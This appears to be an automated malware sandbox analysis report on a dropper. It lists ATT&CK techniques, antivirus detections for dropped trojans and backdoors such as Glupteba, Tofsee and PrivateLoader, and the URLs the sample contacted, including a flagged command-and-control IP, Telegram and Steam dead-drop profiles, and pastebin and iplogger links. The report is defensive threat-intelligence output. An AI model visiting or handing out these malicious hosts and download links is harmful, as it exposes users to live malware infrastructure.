Local Accounts	112 Command and Scripting Interpreter	Login Hook	1 Scheduled Task/Job	11 Scripting	NTDS	631 Security Software Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	Protocol Impersonation			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	2 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	LSA Secrets	2 Process Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Bypass User Account Control	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 File Deletion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Masquerading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Modify Registry	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information
Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	351 Virtualization/Sandbox Evasion	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Exfiltration over USB	Proxy			Network Denial of Service	Virtual Private Server	Determine Physical Locations
Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	12 Process Injection	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Commonly Used Port	Internal Proxy			Direct Network Flood	Server	Business Relationships

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	41%	ReversingLabs	Win32.Trojan.Generic
file.exe	42%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\4f5Nx5TIr9aFLxNLjJPgXzZC.exe	100%	Avira	TR/AD.Nekark.bdamo
C:\Users\user\AppData\Local\KTrOP3dHFImCgksUms5y6GT0.exe	100%	Avira	HEUR/AGEN.1303617
C:\Users\user\AppData\Local\BBqYMraWtNak9E70T03xv71q.exe	100%	Avira	HEUR/AGEN.1303617
C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe	100%	Avira	HEUR/AGEN.1312670
C:\Users\user\AppData\Local\7kfsbB1Hl48Vwwq14EpVnfnY.exe	100%	Avira	TR/AD.Nekark.bdamo
C:\Users\user\AppData\Local\JJ3cNx9vKHcCuMyuszfvJls9.exe	100%	Avira	HEUR/AGEN.1303617
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/AD.Nekark.bdamo
C:\Users\user\AppData\Local\H62xkOOft6fSMQ98kaLeH0L3.exe	100%	Avira	HEUR/AGEN.1312670
C:\Users\user\AppData\Local\7vGVJ4vo69rcWRQudRLDXauN.exe	100%	Avira	HEUR/AGEN.1312670
C:\Users\user\AppData\Local\4HEo1sjjkhLSQkWpfp7Tvy6i.exe	100%	Avira	TR/AD.Nekark.bdamo
C:\Users\user\AppData\Local\KTrOP3dHFImCgksUms5y6GT0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\BBqYMraWtNak9E70T03xv71q.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\JJ3cNx9vKHcCuMyuszfvJls9.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\H62xkOOft6fSMQ98kaLeH0L3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\7vGVJ4vo69rcWRQudRLDXauN.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	88%	ReversingLabs	Win64.Trojan.Lgoogloader
C:\Program Files\Google\Chrome\updater.exe	76%	Virustotal		Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\3zo1tV5f3Ay9BnN3gEE89S3s.exe	52%	ReversingLabs	Win64.Trojan.CrypterX
C:\Users\user\AppData\Local\3zo1tV5f3Ay9BnN3gEE89S3s.exe	62%	Virustotal		Browse
C:\Users\user\AppData\Local\4HEo1sjjkhLSQkWpfp7Tvy6i.exe	88%	ReversingLabs	Win64.Trojan.Lgoogloader
C:\Users\user\AppData\Local\4f5Nx5TIr9aFLxNLjJPgXzZC.exe	88%	ReversingLabs	Win64.Trojan.Lgoogloader
C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe	100%	ReversingLabs	Win32.Backdoor.Tofsee
C:\Users\user\AppData\Local\7kfsbB1Hl48Vwwq14EpVnfnY.exe	88%	ReversingLabs	Win64.Trojan.Lgoogloader
C:\Users\user\AppData\Local\7vGVJ4vo69rcWRQudRLDXauN.exe	100%	ReversingLabs	Win32.Backdoor.Tofsee
C:\Users\user\AppData\Local\BBqYMraWtNak9E70T03xv71q.exe	95%	ReversingLabs	Win32.Trojan.Glupteba
C:\Users\user\AppData\Local\Dd4nzJ5vUMeQnN3MK6ZRgV3f.exe	52%	ReversingLabs	Win64.Trojan.CrypterX
C:\Users\user\AppData\Local\GpflmvanezvTQUdAxFgnanZZ.exe	52%	ReversingLabs	Win64.Trojan.CrypterX
C:\Users\user\AppData\Local\H62xkOOft6fSMQ98kaLeH0L3.exe	100%	ReversingLabs	Win32.Backdoor.Tofsee
C:\Users\user\AppData\Local\JJ3cNx9vKHcCuMyuszfvJls9.exe	95%	ReversingLabs	Win32.Trojan.Glupteba
C:\Users\user\AppData\Local\KTrOP3dHFImCgksUms5y6GT0.exe	95%	ReversingLabs	Win32.Trojan.Glupteba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\sqlite3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\build[1].exe	91%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Opera_105.0.4970.16_Autoupdate_x64[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Service_32[1].exe	87%	ReversingLabs	Win32.Trojan.PrivateLoader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe	59%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\timeSync[1].exe	38%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\xin[1].exe	34%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\36b88b89v[1].exe	41%	ReversingLabs	Win32.Trojan.SmokeLoader
C:\Users\user\AppData\Local\OUk0jc7FyA7JiXBcKBsav4Ex.exe	100%	ReversingLabs	Win32.Backdoor.Tofsee
C:\Users\user\AppData\Local\OeIzFpPQv96lBLRJ074Q8fw6.exe	95%	ReversingLabs	Win32.Trojan.Glupteba
C:\Users\user\AppData\Local\PG0i0imJz19jFNp7ko6pIPRA.exe	88%	ReversingLabs	Win64.Trojan.Lgoogloader

Source	Detection	Scanner	Label	Link
https://167.235.143.166/llowedCert_OS_1	0%	Avira URL Cloud	safe
https://167.235.143.166/	0%	Avira URL Cloud	safe
https://167.235.143.166	0%	Avira URL Cloud	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
https://features.opera-api2.com/?	0%	Avira URL Cloud	safe
https://167.235.143.166/g	100%	Avira URL Cloud	malware
https://167.235.143.166/m	100%	Avira URL Cloud	malware
http://autoupdate-staging.services.ams.osa/	0%	Avira URL Cloud	safe
http://localhost:3001api/prefs/?product=$1&version=$2..	0%	Avira URL Cloud	safe
https://167.235.143.166/ity	0%	Avira URL Cloud	safe
https://167.235.143.166/g	11%	Virustotal		Browse
https://features.opera-api2.com/?	1%	Virustotal		Browse
https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=da7fffaf-858c-44bb-bd	0%	Avira URL Cloud	safe
https://features.opera-api2.com/	0%	Avira URL Cloud	safe
https://167.235.143.166/	7%	Virustotal		Browse
https://167.235.143.166	7%	Virustotal		Browse
https://167.235.143.166/m	13%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryB	0%	Avira URL Cloud	safe
https://167.235.143.166/S_1	0%	Avira URL Cloud	safe
https://desktop-netinstaller-sub.osp.opera.software/v1/binary;	100%	Avira URL Cloud	malware
https://167.235.143.166/osoft	0%	Avira URL Cloud	safe
https://desktop-netinstaller-sub.osp.opera.software/v1/binary	100%	Avira URL Cloud	malware
https://167.235.143.166/tificate	0%	Avira URL Cloud	safe
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryB	0%	Virustotal		Browse
https://features.opera-api2.com/	0%	Virustotal		Browse
https://167.235.143.166/%	0%	Avira URL Cloud	safe
http://www.opera.com0	0%	Avira URL Cloud	safe
https://desktop-netinstaller-sub.osp.opera.software/v1/binary	1%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/	0%	Avira URL Cloud	safe
https://desktop-netinstaller-sub.osp.opera.software/v1/binary;	0%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryx	0%	Avira URL Cloud	safe
https://167.235.143.166/6	100%	Avira URL Cloud	malware
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryp	0%	Avira URL Cloud	safe
http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching	0%	Avira URL Cloud	safe
https://167.235.143.166/E	100%	Avira URL Cloud	malware
https://167.235.143.166/%	10%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/	0%	Virustotal		Browse
https://www.opera.com..	0%	Avira URL Cloud	safe
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryp	0%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryv.	0%	Avira URL Cloud	safe
https://167.235.143.166/E	11%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryx	0%	Virustotal		Browse
https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s	0%	Virustotal		Browse
https://167.235.143.166/6	11%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryQ.	0%	Avira URL Cloud	safe
https://www.opera.com..	0%	Virustotal		Browse
https://167.235.143.166/66	11%	Virustotal		Browse
https://167.235.143.166/66	100%	Avira URL Cloud	malware
https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s	0%	Avira URL Cloud	safe
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryQ.	0%	Virustotal		Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryv.	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
https://167.235.143.166/llowedCert_OS_1	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://167.235.143.166/m	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://t.me/	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1726494688.000000000078C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://legal.opera.com/terms	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://web.telegram.org	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1726494688.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://167.235.143.166/g	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2622089224.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688557966.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2688496198.00000000007DF000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://www.opera.com/privacy	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://crashpad.chromium.org/bug/new	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://download.opera.com/	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		high
https://download3.operacdn.com/ftp/pub/opera/desktop/105.0.4970.16/win/Opera_105.0.4970.16_Autoupdat	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.opera.com/latest/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://167.235.143.166	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1706606834.000000000077F000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://167.235.143.166/	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.2622067874.0000000009458000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://features.opera-api2.com/?	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://policies.google.com/terms;	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://t.me/starcofeeth	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1726494688.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1706606834.000000000077F000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller	OPqTdTFbxWlK6znimRD995XD.exe	false		high
http://autoupdate-staging.services.ams.osa/	OPqTdTFbxWlK6znimRD995XD.exe	false	Avira URL Cloud: safe	unknown
https://legal.opera.com/terms.	OPqTdTFbxWlK6znimRD995XD.exe	false		high
http://localhost:3001api/prefs/?product=$1&version=$2..	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	low
https://autoupdate.geo.opera.com/https://autoupdate.geo.opera.com/geolocation/OperaDesktophttps://cr	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://www.opera.com/download/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://dc.services.visualstudio.com/v2/track	file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	false		high
https://167.235.143.166/ity	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://telegram.org/tos/	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=da7fffaf-858c-44bb-bd	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://features.opera-api2.com/	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.com	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryB	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://desktop-netinstaller-sub.osp.opera.software/v1/binary;	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://167.235.143.166/S_1	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download3.operacdn.com/	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.opera.com	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://167.235.143.166/osoft	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.opera.com/download/get/?id=63821&autoupdate=1&ni=1&stream=stable&utm_campaign=767&u	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592634901.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1598360457.0000000057328000.00000004.00001000.00020000.00000000.sdmp	false		high
https://desktop-netinstaller-sub.osp.opera.software/v1/binary	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://autoupdate.geo.opera.com/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://download3.operacdn.com/B&	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false		high
https://twitter.com/en/tos;	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://steamcommunity.com/profiles/76561199571056594	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199571056594torosdaghello	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://crashpad.chromium.org/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://redir.opera.com/uninstallsurvey/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://addons.opera.com/en/extensions/details/dify-cashback/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://167.235.143.166/tificate	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://autoupdate.geo.opera.com/geolocation/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://167.235.143.166/%	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1872848729.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592634901.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://crashstats-collector.opera.com/collector/submit	OPqTdTFbxWlK6znimRD995XD.exe	false		high
http://www.opera.com0	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
https://desktop-netinstaller-sub.osp.opera.software/	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592519383.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64T	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592634901.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryx	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://opera.com/privacy	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://167.235.143.166/6	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1817870547.0000000000784000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://legal.opera.com/eula/computers	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryp	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1592712393.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://james.newtonking.com/projects/json	file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sourcecode.opera.com	OPqTdTFbxWlK6znimRD995XD.exe	false		high
http://www.newtonsoft.com/jsonschema	file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	false		high
https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4	file.exe, 00000000.00000002.1468709209.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.whatsapp.com/legal;	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000ECA000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://167.235.143.166/E	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1872848729.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1757611845.0000000000784000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.opera.com..	r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
https://www.opera.com/	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://legal.opera.com/privacy	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://www.nuget.org/packages/Newtonsoft.Json.Bson	file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	false		high
https://help.instagram.com/581066165581870;	OPqTdTFbxWlK6znimRD995XD.exe	false		high
https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s	OPqTdTFbxWlK6znimRD995XD.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/starcofeethtorosdagMozilla/5.0	BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryv.	r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1574710407.0000000001209000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1577176941.0000000001203000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
